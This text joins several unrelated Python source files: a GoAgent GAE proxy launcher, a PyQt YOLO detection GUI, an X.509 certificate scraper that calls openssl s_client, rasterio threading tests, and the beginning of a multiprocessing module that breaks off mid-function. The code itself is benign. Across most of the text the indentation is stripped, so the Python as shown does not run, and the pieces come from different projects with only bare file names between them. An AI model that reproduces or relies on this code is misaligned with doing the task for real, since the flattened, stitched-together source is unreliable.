# Shusen Liu <liushusen.smart@gmail.com>
# Yad Smood <y.s.inside@gmail.com>
# Chen Shuang <cs0x7f@gmail.com>
# cnfuyu <cnfuyu@gmail.com>
# cuixin <steven.cuixin@gmail.com>
import sys
import os
current_path = os.path.dirname(os.path.abspath(__file__))
root_path = os.path.abspath( os.path.join(current_path, os.pardir, os.pardir))
data_path = os.path.join(root_path, 'data')
data_gae_proxy_path = os.path.join(data_path, 'gae_proxy')
python_path = os.path.abspath( os.path.join(root_path, 'python27', '1.0'))
noarch_lib = os.path.abspath( os.path.join(python_path, 'lib', 'noarch'))
sys.path.append(noarch_lib)
if sys.platform == "win32":
win32_lib = os.path.abspath( os.path.join(python_path, 'lib', 'win32'))
sys.path.append(win32_lib)
elif sys.platform.startswith("linux"):
linux_lib = os.path.abspath( os.path.join(python_path, 'lib', 'linux'))
sys.path.append(linux_lib)
elif sys.platform == "darwin":
darwin_lib = os.path.abspath( os.path.join(python_path, 'lib', 'darwin'))
sys.path.append(darwin_lib)
extra_lib = "/System/Library/Frameworks/Python.framework/Versions/2.7/Extras/lib/python"
sys.path.append(extra_lib)
import time
import traceback
import platform
import random
import threading
import urllib2
__file__ = os.path.abspath(__file__)
if os.path.islink(__file__):
__file__ = getattr(os, 'readlink', lambda x: x)(__file__)
work_path = os.path.dirname(os.path.abspath(__file__))
os.chdir(work_path)
def create_data_path():
if not os.path.isdir(data_path):
os.mkdir(data_path)
if not os.path.isdir(data_gae_proxy_path):
os.mkdir(data_gae_proxy_path)
create_data_path()
from config import config
from xlog import Logger
if config.log_file:
log_file = os.path.join(data_gae_proxy_path, "local.log")
else:
log_file = None
xlog = Logger(buffer_size=500, file_name=log_file)
from cert_util import CertUtil
import pac_server
import simple_http_server
import proxy_handler
import connect_control
import env_info
import connect_manager
from gae_handler import spawn_later
# launcher/module_init will check this value for start/stop finished
ready = False
def pre_start():
def get_windows_running_process_list():
import os
import glob
import ctypes
import collections
Process = collections.namedtuple('Process', 'pid name exe')
process_list = []
if os.name == 'nt':
PROCESS_QUERY_INFORMATION = 0x0400
PROCESS_VM_READ = 0x0010
lpidProcess= (ctypes.c_ulong * 1024)()
cb = ctypes.sizeof(lpidProcess)
cbNeeded = ctypes.c_ulong()
ctypes.windll.psapi.EnumProcesses(ctypes.byref(lpidProcess), cb, ctypes.byref(cbNeeded))
nReturned = cbNeeded.value/ctypes.sizeof(ctypes.c_ulong())
pidProcess = [i for i in lpidProcess][:nReturned]
has_queryimage = hasattr(ctypes.windll.kernel32, 'QueryFullProcessImageNameA')
for pid in pidProcess:
hProcess = ctypes.windll.kernel32.OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, 0, pid)
if hProcess:
modname = ctypes.create_string_buffer(2048)
count = ctypes.c_ulong(ctypes.sizeof(modname))
if has_queryimage:
ctypes.windll.kernel32.QueryFullProcessImageNameA(hProcess, 0, ctypes.byref(modname), ctypes.byref(count))
else:
ctypes.windll.psapi.GetModuleFileNameExA(hProcess, 0, ctypes.byref(modname), ctypes.byref(count))
exe = modname.value
name = os.path.basename(exe)
process_list.append(Process(pid=pid, name=name, exe=exe))
ctypes.windll.kernel32.CloseHandle(hProcess)
elif sys.platform.startswith('linux'):
for filename in glob.glob('/proc/[0-9]*/cmdline'):
pid = int(filename.split('/')[2])
exe_link = '/proc/%d/exe' % pid
if os.path.exists(exe_link):
exe = os.readlink(exe_link)
name = os.path.basename(exe)
process_list.append(Process(pid=pid, name=name, exe=exe))
else:
try:
import psutil
process_list = psutil.get_process_list()
except Exception as e:
xlog.exception('psutil.get_windows_running_process_list() failed: %r', e)
return process_list
if sys.platform == 'cygwin':
xlog.info('cygwin is not officially supported, please continue at your own risk :)')
#sys.exit(-1)
elif os.name == 'posix':
try:
import resource
resource.setrlimit(resource.RLIMIT_NOFILE, (8192, -1))
except Exception as e:
pass
elif os.name == 'nt':
import ctypes
ctypes.windll.kernel32.SetConsoleTitleW(u'GoAgent ')
if not config.LISTEN_VISIBLE:
ctypes.windll.user32.ShowWindow(ctypes.windll.kernel32.GetConsoleWindow(), 0)
else:
ctypes.windll.user32.ShowWindow(ctypes.windll.kernel32.GetConsoleWindow(), 1)
if config.LOVE_ENABLE and random.randint(1, 100) <= 5:
title = ctypes.create_unicode_buffer(1024)
ctypes.windll.kernel32.GetConsoleTitleW(ctypes.byref(title), len(title)-1)
ctypes.windll.kernel32.SetConsoleTitleW('%s %s' % (title.value, random.choice(config.LOVE_TIP)))
blacklist = {'360safe': False,
'QQProtect': False, }
softwares = [k for k, v in blacklist.items() if v]
if softwares:
tasklist = '\n'.join(x.name for x in get_windows_running_process_list()).lower()
softwares = [x for x in softwares if x.lower() in tasklist]
if softwares:
title = u'GoAgent 建议'
error = u'某些安全软件(如 %s)可能和本软件存在冲突,造成 CPU 占用过高。\n如有此现象建议暂时退出此安全软件来继续运行GoAgent' % ','.join(softwares)
ctypes.windll.user32.MessageBoxW(None, error, title, 0)
#sys.exit(0)
if config.GAE_APPIDS[0] == 'gae_proxy':
xlog.critical('please edit %s to add your appid to [gae] !', config.CONFIG_FILENAME)
sys.exit(-1)
if config.PAC_ENABLE:
pac_ip = config.PAC_IP
url = 'http://%s:%d/%s' % (pac_ip, config.PAC_PORT, config.PAC_FILE)
spawn_later(600, urllib2.build_opener(urllib2.ProxyHandler({})).open, url)
def log_info():
xlog.info('------------------------------------------------------')
xlog.info('Python Version : %s', platform.python_version())
xlog.info('OS : %s', env_info.os_detail())
xlog.info('Listen Address : %s:%d', config.LISTEN_IP, config.LISTEN_PORT)
if config.CONTROL_ENABLE:
xlog.info('Control Address : %s:%d', config.CONTROL_IP, config.CONTROL_PORT)
if config.PROXY_ENABLE:
xlog.info('%s Proxy : %s:%s', config.PROXY_TYPE, config.PROXY_HOST, config.PROXY_PORT)
xlog.info('GAE APPID : %s', '|'.join(config.GAE_APPIDS))
if config.PAC_ENABLE:
xlog.info('Pac Server : http://%s:%d/%s', config.PAC_IP, config.PAC_PORT, config.PAC_FILE)
#info += 'Pac File : file://%s\n' % os.path.join(self.DATA_PATH, self.PAC_FILE)
xlog.info('------------------------------------------------------')
def main():
global ready
connect_control.keep_running = True
config.load()
connect_manager.https_manager.load_config()
xlog.debug("## GAEProxy set keep_running: %s", connect_control.keep_running)
# to profile gae_proxy, run proxy.py, visit some web by proxy, then visit http://127.0.0.1:8084/quit to quit and print result.
do_profile = False
if do_profile:
import cProfile, pstats
pr = cProfile.Profile()
pr.enable()
global __file__
__file__ = os.path.abspath(__file__)
if os.path.islink(__file__):
__file__ = getattr(os, 'readlink', lambda x: x)(__file__)
os.chdir(os.path.dirname(os.path.abspath(__file__)))
#xlog.basicConfig(level=xlog.DEBUG if config.LISTEN_DEBUGINFO else xlog.INFO, format='%(levelname)s - %(asctime)s %(message)s', datefmt='[%b %d %H:%M:%S]')
pre_start()
log_info()
CertUtil.init_ca()
proxy_daemon = simple_http_server.HTTPServer((config.LISTEN_IP, config.LISTEN_PORT), proxy_handler.GAEProxyHandler)
proxy_thread = threading.Thread(target=proxy_daemon.serve_forever)
proxy_thread.setDaemon(True)
proxy_thread.start()
if config.PAC_ENABLE:
pac_daemon = simple_http_server.HTTPServer((config.PAC_IP, config.PAC_PORT), pac_server.PACServerHandler)
pac_thread = threading.Thread(target=pac_daemon.serve_forever)
pac_thread.setDaemon(True)
pac_thread.start()
ready = True # checked by launcher.module_init
while connect_control.keep_running:
time.sleep(1)
xlog.info("Exiting gae_proxy module...")
proxy_daemon.shutdown()
proxy_daemon.server_close()
proxy_thread.join()
if config.PAC_ENABLE:
pac_daemon.shutdown()
pac_daemon.server_close()
pac_thread.join()
ready = False # checked by launcher.module_init
xlog.debug("## GAEProxy set keep_running: %s", connect_control.keep_running)
if do_profile:
pr.disable()
pr.print_stats()
# called by launcher/module/stop
def terminate():
xlog.info("start to terminate GAE_Proxy")
connect_control.keep_running = False
xlog.debug("## Set keep_running: %s", connect_control.keep_running)
if __name__ == '__main__':
try:
main()
except Exception:
traceback.print_exc(file=sys.stdout)
except KeyboardInterrupt:
terminate()
sys.exit()
|
main_widget.py
|
# -*- coding: utf-8 -*-
import sys
import os
import time
import torch
if hasattr(sys, 'frozen'):
os.environ['PATH'] = sys._MEIPASS + ";" + os.environ['PATH']
from PyQt5 import QtWidgets
from PyQt5.QtWidgets import *
from PyQt5 import QtCore, QtGui, uic
from PyQt5.QtCore import *
from PyQt5.QtGui import *
from PyQt5.QtWebEngineWidgets import *
from image_widget import ImageWidget
from common_utils import get_api_from_model
import threading
import qdarkstyle
import json
try:
import queue
except ImportError:
import Queue as queue
# UI configuration file
cUi, cBase = uic.loadUiType("main_widget.ui")
# Main window
class MainWidget(QWidget, cUi):
log_sig = pyqtSignal(str)
def __init__(self): #, main_widget=None):
        # Set up the UI
        QWidget.__init__(self)
cUi.__init__(self)
self.setupUi(self)
# read info
with open('./info.json', 'r') as f:
self.info = json.load(f)
# init title
self.setWindowTitle(self.info['version'])
icon = QIcon()
icon.addPixmap(QPixmap('./icons/logo.png'))
self.setWindowIcon(icon)
# init imagewidget
self.cImageWidget = ImageWidget()
self.cImageWidget.set_alg_handle(self)
self.tabWidget.insertTab(0, self.cImageWidget, "预测")
self.tabWidget.setTabIcon(0, QIcon(QPixmap("./icons/no_news.png")))
# init config widget
self.btnSaveCfg.hide()
self.tabWidget.setTabIcon(1, QIcon(QPixmap("./icons/no_news.png")))
# init help widget
self.has_news = False
self.cBrowser = QWebEngineView()
webEngineSettings = self.cBrowser.settings()
webEngineSettings.setAttribute(QWebEngineSettings.LocalStorageEnabled, False)
engineProfile = self.cBrowser.page().profile()
engineProfile.clearHttpCache()
cookie = engineProfile.cookieStore()
cookie.deleteAllCookies()
self.cBrowser.load(QUrl('http://www.lgddx.cn/projects/yolo_all/news/index.htm'))
self.tabWidget.insertTab(2, self.cBrowser, "帮助")
self.tabWidget.setTabIcon(2, QIcon(QPixmap("./icons/no_news.png")))
# show imagewidget
self.tabWidget.setCurrentIndex(0)
# init treewidget
self.treeModel.header().setVisible(False)
# init log
self.log_sig.connect(self.slot_log_info)
self.alg = None
self.alg_name = None
self.model_name = None
self.model_cfg = None
self.model_cfg_widget = {}
self.alg_model_map = {}
self.det_thread_flag = True
self.det_thread_queue = queue.Queue(maxsize=2)
self.det_thread_handle = threading.Thread(target=self.det_thread_func, args=())
self.det_thread_handle.start()
self.update_model_flag = False
self.create_model_process = 0
self.create_process_dialog = None
def slot_log_info(self, info):
if str(info).startswith('cmd:'):
if 'load models finished' in str(info):
self.init_model_tree()
if 'start create model' in str(info):
self.tabWidget.setCurrentIndex(0)
self.cImageWidget.change_background('start_load')
if 'create model failed' in str(info):
self.cImageWidget.change_background('load_fail')
if 'create model success' in str(info):
self.cImageWidget.change_background('load_success')
if 'pretrain unget' in str(info):
box_message = str(info).split('=')[-1]
box = QMessageBox()
box.setIcon(QMessageBox.Critical)
box.setTextInteractionFlags(Qt.TextSelectableByMouse)
box.setWindowTitle(u"预训练模型未下载")
box.setText(box_message)
box.setTextInteractionFlags(Qt.TextSelectableByMouse)
box.exec()
if 'update title' in str(info):
title_name = str(info).split('=')[-1]
self.setWindowTitle(title_name)
elif str(info).startswith('news_id'):
self.tabWidget.setTabIcon(2, QIcon(QPixmap("./icons/news.png")))
else:
self.logEdit.append('<font color="#FF9090">%s</font>'%(info))
def check_news(self, x):
lines = x.split('\n')
for line in lines:
if 'news_id' in line:
id = int(line.split(':')[-1])
if id != self.info['news_id']:
self.info['news_id'] = id
self.has_news = True
with open('./info.json', 'w') as f:
json.dump(self.info, f)
self.log_sig.emit('news_id')
break
def det_thread_func(self):
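        # Background worker: load the available models, then keep pulling frames
        # from det_thread_queue and run inference with the currently selected model.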
self.log_sig.emit('检测线程启动')
# search all algs
self.search_alg_and_model()
# check news_id
self.cBrowser.page().toPlainText(self.check_news)
while self.det_thread_flag:
if self.update_model_flag:
self.updaet_model()
self.update_model_flag = False
try:
img = self.det_thread_queue.get(block=True, timeout=0.2)
#self.log_sig.emit('det thread get a img')
except queue.Empty:
img = None
#self.log_sig.emit('det thread get waiting for img')
if img is not None and self.alg is not None:
start_time = time.time()
ret = self.alg.inference(img)
if self.cImageWidget is not None:
time_spend = time.time()-start_time
if 'result' not in self.model_cfg.keys():
save_result = 0
save_path = None
else:
save_result = int(self.model_cfg['result']['save_result'])
save_path = self.model_cfg['result']['save_dir']
self.cImageWidget.slot_alg_result(img, ret, time_spend, save_result, save_path)
def add_img(self, img):
if self.det_thread_queue.full():
return
else:
self.det_thread_queue.put(img)
def search_alg_and_model(self):
self.alg_model_map = {}
self.log_sig.emit('>开始加载模型,请等待所有模型加载成功')
for sub_dir in os.listdir('./model_zoo'):
self.log_sig.emit('>>正在加载模型: %s'%str(sub_dir))
sub_path = os.path.join('./model_zoo', sub_dir)
if os.path.isdir(sub_path):
api = get_api_from_model(str(sub_dir))
if api is not None:
self.alg = api.Alg()
self.alg_model_map[str(sub_dir)] = self.alg.get_support_models()
self.log_sig.emit('>>加载模型: %s 成功'%str(sub_dir))
else:
self.alg_model_map[str(sub_dir)] = []
self.log_sig.emit('>>加载模型: %s 失败'%str(sub_dir))
self.log_sig.emit('>加载模型结束')
self.log_sig.emit('cmd:load models finished')
def init_model_tree(self):
for alg in self.alg_model_map.keys():
item_alg = QTreeWidgetItem(self.treeModel)
#item_alg.setFlags(Qt.ItemIsEnabled)
item_alg.setText(0, alg)
for model in self.alg_model_map[alg]:
item_model = QTreeWidgetItem(item_alg)
item_model.setText(0, model)
def updaet_model(self):
self.log_sig.emit('cmd:start create model')
self.log_sig.emit('开始创建模型: %s'%str(self.model_name))
self.log_sig.emit(' 停止ImageWidget')
self.cImageWidget.stop_all()
title_name = 'YoloAll V2.0.0 当前模型:' + self.model_name
pretrain_path = './model_zoo/' + self.alg_name + '/' + self.model_cfg['normal']['weight']
if not os.path.exists(pretrain_path):
self.log_sig.emit(' 创建模型: %s 失败,预训练模型未下载'%str(self.model_name))
box_info = u'请到如下地址下载预训练模型\n放到 model_zoo/%s 下面\n下载地址:\n%s'%(self.alg_name, self.model_cfg['normal']['url'])
self.log_sig.emit('cmd:pretrain unget=%s'%box_info)
self.alg = None
return
if self.alg is not None:
device = 'cuda' if self.model_cfg['device']['dev_type'] == 'gpu' else 'cpu'
title_name += ' 设备类型:' + device
self.log_sig.emit(' 设备类型:' + device)
self.alg.create_model(self.model_name, device)
self.log_sig.emit('cmd:create model success')
self.log_sig.emit(' 创建模型: %s 结束'%str(self.model_name))
else:
self.log_sig.emit('cmd:create model failed')
self.log_sig.emit(' 创建模型: %s 失败,算法句柄尚未创建'%str(self.model_name))
self.alg = None
self.log_sig.emit('cmd:update title=%s'%(title_name))
def _translate_str(self, ori_str):
translate_map = {'device': '设备配置',
'dev_type': '设备类型(cpu/gpu)',
'result': '检测结果配置',
'save_result': '是否保存结果',
'save_dir': '保存路径',
'normal': '通用配置',
}
if ori_str in translate_map.keys():
return translate_map[ori_str]
else:
return ori_str
def _init_cfg_widget(self):
old_items = []
for i in range(self.cfg_layout.count()):
old_items.append(self.cfg_layout.itemAt(i))
for old_item in old_items:
self.cfg_layout.removeItem(old_item)
self.model_cfg_widget = {}
if self.alg is not None:
self.btnSaveCfg.show()
self.model_cfg = self.alg.get_model_cfg(self.model_name)
for key in self.model_cfg.keys():
label_title = QLabel()
label_title.setText('<font color="#FF9090">%s</font>'%(self._translate_str(key)))
self.cfg_layout.addWidget(label_title)
self.model_cfg_widget[key] = {}
for sub_key in self.model_cfg[key]:
frame = QFrame()
edit_layout = QHBoxLayout()
edit_key = QLineEdit()
edit_value = QLineEdit()
edit_key.setText(self._translate_str(sub_key))
edit_key.setReadOnly(False)
edit_key.setFocusPolicy(Qt.NoFocus)
edit_value.setText(str(self.model_cfg[key][sub_key]))
edit_layout.addWidget(edit_key)
edit_layout.addWidget(edit_value)
edit_layout.setStretch(0, 1)
edit_layout.setStretch(1, 2)
self.cfg_layout.addLayout(edit_layout)
self.model_cfg_widget[key][sub_key] = edit_value
label_space = QLabel()
self.cfg_layout.addWidget(label_space)
spacer = QSpacerItem(20, 20, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)
self.cfg_layout.addItem(spacer)
def _get_cfg_widget(self):
for key in self.model_cfg_widget.keys():
for sub_key in self.model_cfg_widget[key].keys():
edit_widget = self.model_cfg_widget[key][sub_key]
old_cfg_value = self.model_cfg[key][sub_key]
new_cfg_value = edit_widget.text()
if sub_key == 'dev_type':
if new_cfg_value != 'cpu':
if not torch.cuda.is_available():
reply = QMessageBox.warning(self,
u'警告',
u'当前pytorch不支持cuda, 将创建cpu模型',
QMessageBox.Yes)
edit_widget.setText('cpu')
new_cfg_value = 'cpu'
self.model_cfg[key][sub_key] = new_cfg_value
def on_treeModel_itemClicked(self, item, seq):
print(item.text(0), item.parent())
if item.parent() is None:
print('you select alg')
else:
print('yolo select model: ', item.parent().text(0), item.text(0))
self.alg_name = item.parent().text(0)
self.model_name = item.text(0)
api = get_api_from_model(self.alg_name)
if api is None:
self.alg = None
print('error, the api can not import')
else:
self.alg = api.Alg()
self._init_cfg_widget()
#self.updaet_model()
self.update_model_flag = True
@pyqtSlot()
def on_btnSaveCfg_clicked(self):
print('button btnSaveCfg clicked')
self._get_cfg_widget()
self.alg.put_model_cfg(self.model_name, self.model_cfg)
#self.updaet_model()
self.update_model_flag = True
def closeEvent(self, event):
reply = QMessageBox.question(self, 'Message',"Are you sure to quit?",
QMessageBox.Yes | QMessageBox.No, QMessageBox.No)
if reply == QMessageBox.Yes:
event.accept()
self.cImageWidget.stop_all()
self.det_thread_flag = False
self.det_thread_handle.join()
else:
event.ignore()
if __name__ == "__main__":
cApp = QApplication(sys.argv)
cMainWidget = MainWidget()
cApp.setStyleSheet(qdarkstyle.load_stylesheet(qt_api='pyqt5'))
cMainWidget.show()
sys.exit(cApp.exec_())
|
cert_scrape.py
|
#!/usr/bin/python3
# x509-cert-testcorpus - X.509 certificate test corpus
# Copyright (C) 2018-2019 Johannes Bauer
# License: CC-0
import sys
import sqlite3
import contextlib
import subprocess
import multiprocessing
import hashlib
import time
import collections
import random
import re
from CertDatabase import CertDatabase
from FriendlyArgumentParser import FriendlyArgumentParser
parser = FriendlyArgumentParser(description = "Scrape certificates from websites.")
parser.add_argument("-d", "--domainname-dbfile", metavar = "filename", type = str, default = "certs/domainnames.sqlite3", help = "Specifies database file that contains the domain names to scrape. Defaults to %(default)s.")
parser.add_argument("-g", "--gracetime", metavar = "secs", type = float, default = 1, help = "Gracetime between scrapings of different domains, in seconds. Defaults to %(default).1f seconds.")
parser.add_argument("-p", "--parallel", metavar = "processes", type = int, default = 20, help = "Numer of concurrent processes that scrape. Defaults to %(default)d.")
parser.add_argument("-t", "--timeout", metavar = "secs", type = int, default = 15, help = "Timeout after which connection is discarded, in seconds. Defaults to %(default)d.")
parser.add_argument("-a", "--maxage", metavar = "days", type = int, default = 365, help = "Age after which another attempt is retried, in days. Defaults to %(default)d.")
parser.add_argument("-l", "--limit", metavar = "count", type = int, help = "Quit after this amount of calls.")
parser.add_argument("-c", "--certdb", metavar = "path", type = str, default = "certs", help = "Specifies the path of the certificate database. Defaults to %(default)s.")
parser.add_argument("--skip-local-db-update", action = "store_true", help = "Do not try to update the domainname database file from the actual certificate content database.")
parser.add_argument("domainname", nargs = "*", help = "When explicit domain names are supplied on the command line, only those are scraped and the max age is disregarded.")
args = parser.parse_args(sys.argv[1:])
class CertRetriever():
_CERT_RE = re.compile("-----BEGIN CERTIFICATE-----[A-Za-z0-9+/=\s]+-----END CERTIFICATE-----", flags = re.MULTILINE)
def __init__(self, timeout):
self._timeout = timeout
def _parse_certs(self, openssl_output):
output_text = openssl_output.decode("utf-8", errors = "replace")
certs = [ ]
for match in self._CERT_RE.finditer(output_text):
cert_text = match.group(0).encode("ascii")
der_cert = subprocess.check_output([ "openssl", "x509", "-outform", "der" ], input = cert_text)
certs.append(der_cert)
return certs
def retrieve(self, servername, port = 443):
cmd = [ "openssl", "s_client", "-showcerts", "-connect", "%s:%d" % (servername, port), "-servername", servername ]
proc = subprocess.Popen(cmd, stdin = subprocess.DEVNULL, stdout = subprocess.PIPE, stderr = subprocess.DEVNULL)
try:
proc.wait(timeout = self._timeout)
if proc.returncode == 0:
stdout = proc.stdout.read()
try:
der_certs = self._parse_certs(stdout)
return ("ok", der_certs)
except subprocess.CalledProcessError:
# Did not contain certificate?
return ("nocert", None)
else:
# Failed with error
return ("error", None)
except subprocess.TimeoutExpired:
# Process unresponsive
proc.kill()
return ("timeout", None)
class Scraper():
def __init__(self, args):
self._args = args
self._db = sqlite3.connect(self._args.domainname_dbfile)
self._cursor = self._db.cursor()
with contextlib.suppress(sqlite3.OperationalError):
self._cursor.execute("""
CREATE TABLE domainnames (
domainname PRIMARY KEY NOT NULL,
last_successful_timet integer NOT NULL,
last_attempted_timet integer NOT NULL,
last_result NULL
);
""")
self._domainnames = [ ]
self._total_domain_count = 0
self._cert_retriever = CertRetriever(self._args.timeout)
self._certdb = CertDatabase(self._args.certdb)
if not self._args.skip_local_db_update:
self._update_local_database()
def _update_local_database(self):
most_recent_connections = self._certdb.get_most_recent_connections()
connection_count = len(most_recent_connections)
print("Updating local index from %d recent connections within certificate database..." % (connection_count))
for (entry_no, (servername, fetch_timestamp)) in enumerate(most_recent_connections):
if (entry_no % 20000) == 0:
print("Updating %d/%d (%.1f%%)" % (entry_no, connection_count, entry_no / connection_count * 100))
row = self._db.execute("SELECT last_attempted_timet FROM domainnames WHERE domainname = ?;", (servername, )).fetchone()
if row is None:
# Servername not yet known in domainnames.sqlite3, insert it.
self._db.execute("INSERT INTO domainnames (domainname, last_successful_timet, last_attempted_timet, last_result) VALUES (?, ?, ?, 'ok');", (servername, fetch_timestamp, fetch_timestamp))
else:
last_timestamp_domainnames = row[0]
if last_timestamp_domainnames < fetch_timestamp:
# We have a newer one in the actual dataset, update metadata database
self._db.execute("UPDATE domainnames SET last_successful_timet = ?, last_attempted_timet = ?, last_result = 'ok' WHERE domainname = ?;", (fetch_timestamp, fetch_timestamp, servername))
self._db.commit()
def _worker(self, work_queue, result_queue):
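        # Worker process: scrape certificates for each domain name pulled from the
        # work queue until a None sentinel arrives, pushing results to the result queue.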
while True:
next_job = work_queue.get()
if next_job is None:
break
domainname = next_job
scraped_cert = self._cert_retriever.retrieve(domainname)
result = (next_job, scraped_cert)
result_queue.put(result)
def _feeder(self, work_queue, result_queue):
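        # Feeder process: enqueue the (shuffled) domain names, honouring --limit,
        # then send one None sentinel per worker so they all shut down.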
class BreakFreeException(Exception): pass
fed_items = 0
try:
random.shuffle(self._domainnames)
for domainname in self._domainnames:
fed_items += 1
work_queue.put(domainname)
if (self._args.limit is not None) and (fed_items >= self._args.limit):
raise BreakFreeException()
except BreakFreeException:
pass
# Finally kill all workers
for i in range(self._args.parallel):
work_queue.put(None)
def _eater(self, work_queue, result_queue):
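        # Eater process: consume scrape results, print running statistics and write
        # certificates/metadata to the databases, committing periodically.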
processed_count = 0
new_cert_count = 0
count_by_return = collections.Counter()
while True:
next_result = result_queue.get()
if next_result is None:
break
(domainname, (resultcode, der_certs)) = next_result
processed_count += 1
count_by_return[resultcode] += 1
status_str = [ ]
for (keyword, text) in (("ok", "OK"), ("nocert", "No cert"), ("error", "Error"), ("timeout", "Timeout")):
count = count_by_return[keyword]
if count > 0:
status_str.append("%s %d/%.1f%%" % (text, count, count / processed_count * 100))
status_str = " ".join(status_str)
if resultcode == "ok":
result_comment = " [%d certs]" % (len(der_certs))
else:
result_comment = ""
line_left = "%d/%d (%.1f%%): %s: %s%s" % (processed_count, self._total_domain_count, processed_count / self._total_domain_count * 100, domainname, resultcode, result_comment)
print("%-90s %s" % (line_left, status_str))
now = round(time.time())
if resultcode == "ok":
self._cursor.execute("UPDATE domainnames SET last_successful_timet = ?, last_attempted_timet = ?, last_result = ? WHERE domainname = ?;", (now, now, resultcode, domainname))
self._certdb.insert_connection(servername = domainname, fetch_timestamp = now, certs = der_certs)
new_cert_count += 1
if (new_cert_count % 1000) == 0:
self._certdb.commit()
else:
self._cursor.execute("UPDATE domainnames SET last_attempted_timet = ?, last_result = ? WHERE domainname = ?;", (now, resultcode, domainname))
if (processed_count % 2500) == 0:
self._certdb.commit()
self._db.commit()
self._certdb.commit()
self._db.commit()
def run(self):
candidate_count = self._cursor.execute("SELECT COUNT(DISTINCT domainname) FROM domainnames;").fetchone()[0]
if len(self._args.domainname) == 0:
before_timet = round(time.time() - (86400 * self._args.maxage))
self._domainnames = [ row[0] for row in self._cursor.execute("SELECT domainname FROM domainnames WHERE COALESCE(last_attempted_timet, 0) < ?;", (before_timet, )).fetchall() ]
else:
self._domainnames = self._args.domainname
self._total_domain_count = len(self._domainnames)
if (self._args.limit is not None) and (self._args.limit < self._total_domain_count):
limited_from = self._total_domain_count
self._total_domain_count = self._args.limit
else:
limited_from = None
if self._total_domain_count == 0:
print("Found no domainnames to scrape out of %d candidates." % (candidate_count))
return
else:
if limited_from is None:
limit_str = ""
else:
limit_str = " (limited from %d)" % (limited_from)
print("Found %d domainnames%s to scrape out of %d candidates." % (self._total_domain_count, limit_str, candidate_count))
# Initialize subprocess queues
work_queue = multiprocessing.Queue(maxsize = 100)
result_queue = multiprocessing.Queue(maxsize = 100)
# Start worker processes
processes = [ multiprocessing.Process(target = self._worker, args = (work_queue, result_queue)) for i in range(self._args.parallel) ]
for process in processes:
process.start()
# Start feeder and eater process
feeder = multiprocessing.Process(target = self._feeder, args = (work_queue, result_queue))
eater = multiprocessing.Process(target = self._eater, args = (work_queue, result_queue))
feeder.start()
eater.start()
# Wait for feeder to finish seeding
feeder.join()
# Then wait for all workers to finish
for process in processes:
process.join()
# Finally, quit the eater process as well
result_queue.put(None)
eater.join()
scraper = Scraper(args)
scraper.run()
|
test_threading.py
|
from threading import Thread
import time
import unittest
import rasterio as rio
from rasterio.env import get_gdal_config
class TestThreading(unittest.TestCase):
def test_multiopen(self):
"""
Open a file from different threads.
Regression test for issue #986
"""
def func(delay):
try:
with rio.open('tests/data/RGB.byte.tif'):
time.sleep(delay)
except Exception as err:
global exceptions
exceptions.append(err)
global exceptions
exceptions = []
t1 = Thread(target=func, args=(0.1,))
t2 = Thread(target=func, args=(0,))
with rio.Env():
t1.start()
t2.start() # potential error if Env manages globals unsafely
t1.join()
t2.join()
assert not exceptions
def test_reliability(self):
"""Allow for nondeterminism of race condition"""
for i in range(3):
self.test_multiopen()
def test_child_thread_inherits_env():
"""A new thread inherit's the main thread's env"""
def func():
with rio.Env(lol='wut'):
assert get_gdal_config('lol') == 'wut'
# The next config option will have been set in the main thread.
assert get_gdal_config('FROM_MAIN') is True
t1 = Thread(target=func)
with rio.Env(FROM_MAIN=True):
t1.start()
assert get_gdal_config('FROM_MAIN') is True
assert get_gdal_config('lol') is None
t1.join()
def test_child_thread_isolation():
"""Child threads have isolated environments"""
def func(key, value, other_key):
env = {key: value}
with rio.Env(**env):
assert get_gdal_config(key) == value
# The other key is one set in another child thread.
assert get_gdal_config(other_key) is None
t1 = Thread(target=func, args=('is_t1', True, 'is_t2'))
t2 = Thread(target=func, args=('is_t2', True, 'is_t1'))
t1.start()
t2.start()
t1.join()
t2.join()
if __name__ == '__main__':
unittest.main()
|
ICOM_P.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import multiprocessing
import os
import sys
from datetime import datetime
from multiprocessing.queues import Queue
from threading import current_thread
import icom_win_msg
import win_instance
import time
from multiprocessing.dummy import Process as dummyProcess
from multiprocessing.dummy import Lock as dummyLock
from icom_ctrl_msg_id import *
import icom_flow_ctrl
NET_SRV_PROCESS_DELAY_START = 1
IN_FROZEN_STATE = False
gui_sync_ctrl_Q = None
processers_count = 1
g_cur_instance_num = 1
#if hasattr(os,'environ') and 'NUMBER_OF_PROCESSORS' in os.environ:
# processers_count = os.environ['NUMBER_OF_PROCESSORS']
# Module multiprocessing is organized differently in Python 3.4+
try:
# Python 3.4+
if sys.platform.startswith('win'):
import multiprocessing.popen_spawn_win32 as forking
else:
import multiprocessing.popen_fork as forking
except ImportError:
import multiprocessing.forking as forking
if sys.platform.startswith('win'):
# First define a modified version of Popen.
class _Popen(forking.Popen):
def __init__(self, *args, **kw):
if hasattr(sys, 'frozen'):
# We have to set original _MEIPASS2 value from sys._MEIPASS
# to get --onefile mode working.
os.putenv('_MEIPASS2', sys._MEIPASS)
try:
super(_Popen, self).__init__(*args, **kw)
finally:
if hasattr(sys, 'frozen'):
# On some platforms (e.g. AIX) 'os.unsetenv()' is not
# available. In those cases we cannot delete the variable
# but only set it to the empty string. The bootloader
# can handle this case.
if hasattr(os, 'unsetenv'):
os.unsetenv('_MEIPASS2')
else:
os.putenv('_MEIPASS2', '')
# Second override 'Popen' class with our modified version.
forking.Popen = _Popen
def gui_process(pro_name,cur_instance_num,win_title,manager_Q,ports_ctrl_Q,tray_ctrl_Q,netsrv_ctrl_Q,gui_sync_ctrl_Q,gui_data_Q,pro_status,__stdout):
from ICOM_lib import gui_main
if is_in_frozen_state():
sys.stdout = __stdout
sys.stderr = __stdout
gui_main(__stdout,cur_instance_num,win_title,manager_Q,ports_ctrl_Q,tray_ctrl_Q,netsrv_ctrl_Q,gui_sync_ctrl_Q,gui_data_Q,pro_status)
def work_ports_process(pro_name,cur_instance_num,win_title,manager_Q,ports_ctrl_Q,gui_sync_ctrl_Q,gui_data_Q):
import ICOM_ports
ICOM_ports.ports_set_vars(manager_Q,ports_ctrl_Q,gui_sync_ctrl_Q,gui_data_Q)
pro_ok = 0
pro_fail = 0
gui_data_Q.put(('READY','PORTS',os.getpid()))
#print ('ports_ctrl_Q',ports_ctrl_Q.qsize(),ports_ctrl_Q.__dict__)
